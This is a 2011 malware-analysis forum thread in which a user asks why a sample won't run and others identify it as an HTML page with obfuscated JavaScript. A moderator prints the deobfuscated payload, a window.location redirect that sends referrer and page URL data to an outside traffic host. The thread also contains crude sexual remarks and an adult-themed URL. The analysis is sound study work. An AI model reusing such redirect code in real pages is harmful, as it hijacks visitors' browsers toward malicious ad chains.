A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #9497  by NarfBang
 Tue Nov 01, 2011 5:33 pm
Does anyone have any idea how this malware works?

Here's the virustotal report.
http://www.virustotal.com/file-scan/rep ... 1319919934

I know it's redirecting to adds within dshorophotohost.com/orders/photos/backup/eating-sweet-pussy/ but I can't seem to infect my machine with this file.
Anyone know why???
I'm getting this error when trying to load the file.
Attachments
pass = infected
(6.45 KiB) Downloaded 47 times
error.JPG
Error message after 2xclicking on exe
error.JPG (31.64 KiB) Viewed 591 times
 #9499  by EP_X0FF
 Tue Nov 01, 2011 6:20 pm
This is HTML page with embedded Java script. Thread split.

Link to formatted JS obfuscated code, deobfuscate yourself, I'm lazy :)

http://pastebin.com/gRhprRTp

edit:
Code: Select all
window.location=encodeURI("http://wes.yourcollectorcar.net/in.cgi?6&tsk=sept-task23-r200-id24-t126-1600hst-0001&type=l&seoref="+encodeURIComponent(document.referrer)+"¶meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX");
Last edited by EP_X0FF on Wed Nov 02, 2011 5:03 am, edited 1 time in total. Reason: edit
 #9524  by NarfBang
 Thu Nov 03, 2011 2:01 pm
Did you unobfuscate the code for me? :D
Muchos Gracias Amigo!
I tried with a few online resources but no luck.
I'm still learning, but thank you for the help.
 #9526  by NarfBang
 Thu Nov 03, 2011 8:38 pm
I'm still having trouble getting this to install properly. It seems to not like something about my computer. I've attached the dropper I'm using, I'm just adding ".exe" to the end and double clicking. Free blowjobs to anyone who can tell me why this won't work. :o I'm installing on XP SP2.
Attachments
password = infected
(6.83 KiB) Downloaded 44 times
 #9528  by Xylitol
 Thu Nov 03, 2011 8:53 pm
http://jsunpack.jeek.org/dec/go?report= ... 0984082dbf
http://urlquery.net/search.php?q=217.74.66.183&type=IP

html ≠ exe
offtopic: Rachael leigh cook isn't the actress who played in 'Antitrust' ?
You're either a one or a zero. Alive or dead. :mrgreen: